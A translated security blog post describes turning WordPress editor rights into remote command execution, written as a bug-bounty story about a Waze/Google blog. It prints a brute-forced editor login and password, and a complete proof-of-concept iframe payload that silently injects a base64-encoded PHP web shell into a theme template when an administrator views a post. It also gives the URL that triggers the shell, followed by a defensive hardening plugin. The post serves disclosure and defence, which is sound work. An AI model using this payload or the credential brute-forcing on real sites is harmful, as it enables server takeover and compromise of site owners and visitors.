
WordPress: insecure out of the box - RCE with editor rights. Plus a story about Google, a startup and 1 billion dollars

Enjoy the read. I want to talk about an insecure feature of the world-famous blog engine WordPress that has been present in it for a long time. Many people know about it (the developers themselves consider this behaviour "legitimate"), but I am not sure anyone has described its use in exactly the attack vector presented in this article (I personally could not find one).

Many companies such as Microsoft, Nokia and Google use WordPress. Blog administrators hand out editor rights to their PR departments ... And here is the main point: in WordPress only two roles may use JavaScript inside posts, administrators and editors.

The whole idea in one sentence: create a post containing malicious JS. If an administrator opens our post, we get Remote Command Execution.

A few days ago I had the time and the desire to dig into some Google site. The target chosen was a startup, waze.com, bought by Google for $1 billion. WordPress was found right away, and I decided to brute-force user passwords with a fairly small wordlist, rockyou-75.txt. On waking up in the morning I saw the coveted:
 [+] Starting the password brute forcer

   [SUCCESS] Login: di-ann Password: illuminati

   +----+--------+------+------------+
   | Id | Login  | Name | Password   |
   +----+--------+------+------------+
   |    | di-ann |      | illuminati |
   +----+--------+------+------------+

 [+] Finished at Sat Sep 7 09:47:27 2013
 [+] Elapsed time: 00:42:52
 Exiting!

Bingo! A password for a user with editor rights. Of course, I immediately wanted to get RCE on the server. But ... the known methods require blog administrator rights. With those, a shell can be uploaded through:


We can perform the same actions via JS: create a post as the editor that opens a hidden iframe and performs the necessary actions inside it. If an admin opens the post, we get RCE.

PoC exploit:
<iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen' style='display:none' onload="if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1) {evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg=='); evilframe.document.getElementById('submit').click();}"></iframe> 


Line by line:
 iframe name='evilframe' src='/wordpress/wp-admin/theme-editor.php?file=404.php&theme=twentythirteen'
   // the iframe loads the 404.php template of the twentythirteen theme in the built-in theme editor
 style='display:none'
   // the iframe is hidden from the viewer
 onload=
   // runs once the editor page has finished loading inside the iframe
 if (evilframe.document.getElementById('newcontent').value.indexOf('system') == -1)
   // only proceed if the template does not already contain the backdoor (the string "system")
 evilframe.document.getElementById('newcontent').value += atob('PD9waHAgQHN5c3RlbSgkX0dFVFsnY21kJ10pOyA/Pg==')
   // appends the decoded payload <?php @system($_GET['cmd']); ?> to the template source
 evilframe.document.getElementById('submit').click()
   // submits the form, saving the modified template


We can also perform any actions under the administrator, for example:


So, with the PoC code above, the backdoor is injected into the 404.php template of the twentythirteen theme as soon as any logged-in administrator opens our post. This works on the latest WordPress version at the time of writing, 3.6.1.

Once the backdoor is in place, RCE is available via the following request (a non-existent post id makes WordPress render the 404 template):

  http://localhost/wordpress/?p=123123123&cmd=id
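
The defensive counterpart, added here as an example and not part of the original post: a must-use plugin that takes away the capability editors need to embed raw JavaScript and disables the built-in theme editor that the PoC relies on. The role and capability names and the constants are WordPress core ones; the file name and placement are my own assumption.

```php
<?php
/**
 * Plugin Name: Harden editor role (added example, not from the original post)
 * Place this file in wp-content/mu-plugins/ so WordPress loads it on every request.
 */

// Block the attack at its root: without the unfiltered_html capability an
// editor's post content is run through wp_kses on save, which strips <iframe>,
// <script> and on* attributes such as the onload handler used in the PoC above.
add_action( 'init', function () {
    $editor = get_role( 'editor' );
    if ( $editor && $editor->has_cap( 'unfiltered_html' ) ) {
        $editor->remove_cap( 'unfiltered_html' ); // persisted in the database
    }
} );
// To strip unfiltered_html from every role, administrators included, define
// DISALLOW_UNFILTERED_HTML instead.

// Remove the admin-side step the PoC depends on: with DISALLOW_FILE_EDIT set,
// theme-editor.php and plugin-editor.php refuse to edit files even for
// administrators. The conventional place for this define is wp-config.php.
if ( ! defined( 'DISALLOW_FILE_EDIT' ) ) {
    define( 'DISALLOW_FILE_EDIT', true );
}
```

Existing posts are not re-filtered by this change, so posts already published by editor accounts should be reviewed for embedded markup.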


In Google's case I did not actually plant the code above; I just recorded a video showing how RCE could be obtained. They immediately removed WordPress and moved to blogger.com. The right decision. I also found other bugs but received no money, since the resource was in the blackout period (6 months after the acquisition). But I was added to the hall of fame :-)

Demo (which was sent to Google):

Source: https://habr.com/ru/post/194282/

